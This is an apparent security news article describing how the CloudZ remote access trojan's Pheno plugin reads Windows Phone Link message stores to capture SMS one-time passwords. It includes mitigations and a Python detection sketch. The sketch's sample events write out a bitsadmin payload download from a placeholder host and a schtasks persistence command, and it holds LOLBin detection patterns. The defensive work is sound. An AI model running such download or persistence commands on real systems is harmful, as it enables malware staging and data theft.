CloudZ RAT Abuses Windows Phone Link to Steal OTPs | eSecurity Planet

Cisco Talos discovered the CloudZ RAT exploiting Microsoft Phone Link to intercept SMS-based OTPs from Windows endpoints.

Written By
Ken Underhill
May 7, 2026

A malware campaign is exploiting a built-in Windows feature to intercept sensitive data — without ever touching the victim’s phone. 

Cisco Talos researchers identified the CloudZ remote access trojan (RAT) using a custom plugin to monitor Microsoft’s Phone Link application and potentially capture SMS-based one-time passwords (OTPs).

“MFA bypass is becoming a bigger and bigger part of the compromise chain, as more people move to deploy it across a variety of accounts,” said Nick Biasini, Head of Outreach at Cisco Talos, in an email to eSecurityPlanet. 

Nick explained, “This plugin is a new approach to MFA bypass by owning the communication channels that exist between your phone and computer.”

Key Takeaways

  • Cisco Talos identified the CloudZ RAT abusing Microsoft Phone Link to intercept SMS-based one-time passwords (OTPs).
  • Attackers can access synced mobile data directly from a Windows endpoint without compromising the victim’s phone.
  • The malware uses the Pheno plugin to monitor Phone Link activity and extract locally stored authentication data.
  • CloudZ relies on stealth techniques such as LOLBins, in-memory execution, and scheduled task persistence to evade detection.
  • The campaign highlights growing risks tied to trusted cross-device integrations and SMS-based authentication.

CloudZ RAT Attack Overview 

Attack Component           Description
Targeted Feature           Microsoft Phone Link
Malware Used               CloudZ Remote Access Trojan (RAT)
Key Plugin                 Pheno
Primary Goal               Intercept SMS OTPs and synced data
Initial Infection Method   Fake software update loader
Data Accessed              SMS messages, notifications, call logs
Evasion Techniques         LOLBins, in-memory execution, sandbox detection
Main Security Risk         Abuse of trusted cross-device integrations

Inside the CloudZ Attack Chain 

This attack targets a trusted cross-device feature embedded in Windows that many organizations rely on for productivity and seamless device integration. 

By abusing Microsoft’s Phone Link application, attackers can bypass mobile security controls and access sensitive authentication data directly from the endpoint.  

Cisco Talos reports the campaign has been active since early 2026, using modular tooling to scale across environments—especially those relying on SMS-based authentication and device sync. 


How the CloudZ Malware Infection Begins 

The intrusion chain begins with a malicious loader disguised as a legitimate software update. 

Once executed, it deploys a .NET-based payload that installs the CloudZ remote access trojan (RAT), establishes persistence via scheduled tasks, and connects to a command-and-control (C2) server to receive instructions. 

From there, the attacker can dynamically load additional capabilities, including the Pheno plugin.

How the Pheno Plugin Targets Phone Link Data 

Pheno plays a critical role by scanning the system for active Phone Link processes such as YourPhone or PhoneExperienceHost.

If detected, it performs further checks to confirm whether an active proxy connection is in use — an indicator that the PC is actively syncing data with a paired mobile device.

Once confirmed, CloudZ can access locally stored SQLite database files that contain synchronized SMS messages, notifications, and call logs, effectively exposing sensitive data at rest on the endpoint.

Attackers Can Access SMS Messages and OTPs 

This technique enables attackers to potentially intercept one-time passwords (OTPs) and other authentication data without ever compromising the mobile device itself. 

The approach is effective because it abuses legitimate functionality and trusted system relationships between devices.

To remain stealthy, CloudZ incorporates multiple evasion techniques, including sandbox and debugger detection, dynamic in-memory execution, and the use of living-off-the-land binaries (LOLBins) such as PowerShell and bitsadmin to download additional payloads. 

These tactics help the malware blend into normal activity, making detection harder and increasing the risk of prolonged access. 


Key Steps to Reduce Exposure 

To reduce exposure to threats like CloudZ, organizations should focus on limiting abuse of trusted features and strengthening endpoint visibility.

  • Restrict or disable Phone Link in sensitive environments and limit access to synced mobile data.
  • Replace SMS-based authentication with phishing-resistant MFA and enforce strong identity controls.
  • Monitor endpoints for suspicious activity, including unusual processes, scheduled tasks, and LOLBin usage.
  • Deploy EDR, SIEM, and DNS filtering to detect anomalies and block malicious infrastructure.
  • Enforce application control, least privilege, and secure configurations to reduce the attack surface.
  • Audit and govern cross-device sync tools and limit access to local data stores like SQLite files.
  • Test incident response plans and use attack simulation tools with scenarios around trust abuse and endpoint compromise. 
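As an added illustration of the monitoring step above, here is a small detection sketch that correlates the behaviours the article attributes to CloudZ and Pheno: a non-Phone Link process reading the synced-message SQLite store, a bitsadmin or PowerShell download, and scheduled task creation. It is example code written for this page, not tooling from Cisco Talos or eSecurity Planet. The event schema and sample telemetry are constructed; the ".exe" suffixes on the YourPhone and PhoneExperienceHost names and the Microsoft.YourPhone_ package folder pattern are assumptions the article does not state and should be checked against a reference build.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Phone Link host process names the article says Pheno looks for.
# Adding the ".exe" suffix is an assumption about how they appear in telemetry.
PHONE_LINK_PROCS = {"yourphone.exe", "phoneexperiencehost.exe"}

# ASSUMED location of the Phone Link package data under %LOCALAPPDATA%\Packages.
# The article only says "locally stored SQLite database files"; confirm the real
# folder name on a reference build before using this pattern in production.
PHONE_LINK_STORE = re.compile(
    r"\\packages\\microsoft\.yourphone_[^\\]*\\.*\.db$", re.I)

# Command-line patterns for the LOLBin downloads and the scheduled-task
# persistence the article describes (bitsadmin, PowerShell, schtasks).
BITSADMIN_XFER = re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)
PS_DOWNLOAD = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc(odedcommand)?\b)", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I)

STORE_TAG = "phone_link_store_read_by_foreign_process"


@dataclass
class Event:
    """One simplified endpoint event (constructed format, not a real EDR schema)."""
    host: str
    kind: str          # "process" = process creation, "file" = file open/read
    image: str         # image name of the acting process
    cmdline: str = ""  # command line, for process events
    target: str = ""   # file path, for file events


def tag_event(ev: Event) -> list[str]:
    """Return the detection tags that apply to one event; [] means nothing matched."""
    tags: list[str] = []
    image = ev.image.lower()
    if ev.kind == "process":
        if BITSADMIN_XFER.search(ev.cmdline):
            tags.append("lolbin_download")
        if image in {"powershell.exe", "pwsh.exe"} and PS_DOWNLOAD.search(ev.cmdline):
            tags.append("lolbin_download")
        if SCHTASKS_CREATE.search(ev.cmdline):
            tags.append("scheduled_task_persistence")
    elif ev.kind == "file":
        # Phone Link's own processes reading their own store is normal; anything
        # else touching the synced-message database is the behaviour to surface.
        if PHONE_LINK_STORE.search(ev.target) and image not in PHONE_LINK_PROCS:
            tags.append(STORE_TAG)
    return tags


def severity(tags: set[str]) -> str:
    """Rate a host: a single signal is 'medium'; the store read combined with a
    LOLBin download or persistence matches the described chain and is 'high'."""
    if not tags:
        return "none"
    if STORE_TAG in tags and len(tags) > 1:
        return "high"
    return "medium"


def score_hosts(events: list[Event]) -> dict[str, dict]:
    """Aggregate tags per host so the chain can be correlated across events."""
    per_host: dict[str, set[str]] = {}
    for ev in events:
        per_host.setdefault(ev.host, set()).update(tag_event(ev))
    return {h: {"tags": sorted(t), "severity": severity(t)} for h, t in per_host.items()}


# Constructed sample telemetry. WS01 is a normal Phone Link user, WS02 shows the
# full described chain, WS03 runs a benign PowerShell command.
STORE = r"\AppData\Local\Packages\Microsoft.YourPhone_PLACEHOLDER\LocalCache\messages.db"
SAMPLE_EVENTS = [
    Event("WS01", "process", "PhoneExperienceHost.exe", "PhoneExperienceHost.exe"),
    Event("WS01", "file", "PhoneExperienceHost.exe", target=r"C:\Users\alice" + STORE),
    Event("WS02", "process", "bitsadmin.exe",
          "bitsadmin.exe /transfer upd /download /priority high "
          "http://update.example/p.bin C:\\Users\\Public\\p.bin"),
    Event("WS02", "process", "schtasks.exe",
          "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\p.bin /sc onlogon"),
    Event("WS02", "file", "p.bin", target=r"C:\Users\bob" + STORE),
    Event("WS03", "process", "powershell.exe", "powershell.exe -NoProfile Get-ChildItem C:\\temp"),
]

if __name__ == "__main__":
    for host, verdict in score_hosts(SAMPLE_EVENTS).items():
        print(host, verdict["severity"], verdict["tags"])
```

The per-host correlation is the point: on its own, a bitsadmin transfer or a new scheduled task is noisy in many fleets, but a foreign process reading the Phone Link store on the same host that just staged a download is exactly the combination the article describes, so it is scored "high" while single signals stay "medium" for triage.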

Implementing these measures together helps organizations build resilience and reduce exposure to attacks that exploit trusted systems and cross-device integrations. 

Risks in Connected Systems 

The CloudZ campaign highlights a broader trend of attackers leveraging legitimate features and integrations to gain access. 

As organizations adopt more interconnected tools, these trust relationships introduce new risks, reinforcing the need to evaluate not just vulnerabilities, but how systems interact and share data. 

These risks are why some organizations are adopting zero trust solutions that continuously validate access and limit implicit trust across systems. 

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.


Property of TechnologyAdvice. © 2026 TechnologyAdvice. All Rights Reserved
